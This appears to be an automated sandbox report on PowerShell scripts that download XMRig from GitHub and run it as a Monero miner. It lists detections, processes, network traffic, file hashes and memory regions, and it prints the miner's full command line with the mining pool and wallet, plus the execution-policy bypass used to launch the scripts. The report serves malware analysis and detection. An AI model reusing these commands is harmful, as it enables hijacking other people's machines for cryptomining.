memory/776-103-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-104-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-105-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-106-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-107-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-108-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-109-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-110-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-111-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-112-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-113-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-114-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-115-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-116-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-117-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:45

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1764s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 200.79.70.13.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

memory/5052-3-0x00007FFF8B983000-0x00007FFF8B984000-memory.dmp

memory/5052-5-0x000001EC2E960000-0x000001EC2E982000-memory.dmp

memory/5052-6-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/5052-9-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/5052-10-0x000001EC470A0000-0x000001EC47116000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dudrpiki.jay.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5052-26-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/5052-49-0x000001EC47120000-0x000001EC47132000-memory.dmp

memory/5052-62-0x000001EC46F00000-0x000001EC46F0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4268-91-0x0000020AEEEE0000-0x0000020AEEF00000-memory.dmp

memory/4268-92-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-93-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/5052-94-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/5052-95-0x00007FFF8B983000-0x00007FFF8B984000-memory.dmp

memory/5052-96-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/4268-97-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-98-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-99-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-100-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-101-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-102-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-103-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-104-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-105-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-106-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-107-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-108-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-109-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-110-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-111-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-112-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-113-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-114-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-115-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-116-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-117-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-118-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-119-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-120-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-121-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-122-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-123-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-124-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-125-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-126-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-127-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-128-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-129-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-130-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-131-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-132-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-133-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-134-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-135-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-136-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-137-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-138-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-139-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-140-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-141-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-142-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-143-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-144-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-145-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-146-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-147-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-148-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-149-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-150-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-151-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-152-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-153-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-154-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-155-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-156-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-157-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/5024-0-0x00007FF90B123000-0x00007FF90B125000-memory.dmp

memory/5024-1-0x0000023E1F6C0000-0x0000023E1F6E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2aruylhc.fwa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5024-11-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/5024-12-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/5024-14-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/5024-15-0x0000023E38800000-0x0000023E38812000-memory.dmp

memory/5024-16-0x0000023E38560000-0x0000023E3856A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/704-47-0x00000265066B0000-0x00000265066D0000-memory.dmp

memory/704-48-0x0000026507EB0000-0x0000026507ED0000-memory.dmp

memory/704-49-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/5024-50-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/5024-51-0x00007FF90B123000-0x00007FF90B125000-memory.dmp

memory/704-52-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/5024-53-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/704-55-0x000002659AAA0000-0x000002659AAC0000-memory.dmp

memory/704-54-0x0000026507ED0000-0x0000026507EF0000-memory.dmp

memory/704-56-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/5024-57-0x00007FF90B120000-0x00007FF90BBE1000-memory.dmp

memory/704-58-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-59-0x0000026507ED0000-0x0000026507EF0000-memory.dmp

memory/704-60-0x000002659AAA0000-0x000002659AAC0000-memory.dmp

memory/704-61-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-62-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-63-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-64-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-65-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-66-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-67-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-68-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-69-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-70-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-71-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-72-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-73-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-74-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-75-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-76-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-77-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-78-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-79-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-80-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-81-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-82-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-83-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-84-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-85-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-86-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-87-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-88-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-89-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-90-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-91-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-92-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-93-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-94-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-95-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-96-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-97-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-98-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-99-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-100-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-101-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-102-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-103-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-104-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-105-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-106-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-107-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-108-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-109-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-110-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-111-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-112-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-113-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-114-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-115-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-116-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-117-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-118-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

memory/704-119-0x00007FF70DB50000-0x00007FF70E783000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:53

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1744s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4676-4-0x00007FFFC2E03000-0x00007FFFC2E04000-memory.dmp

memory/4676-5-0x0000023BFA4D0000-0x0000023BFA4F2000-memory.dmp

memory/4676-9-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-10-0x0000023BFAFC0000-0x0000023BFB036000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ab2s4f30.zws.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4676-11-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-26-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-49-0x0000023BFAFA0000-0x0000023BFAFB2000-memory.dmp

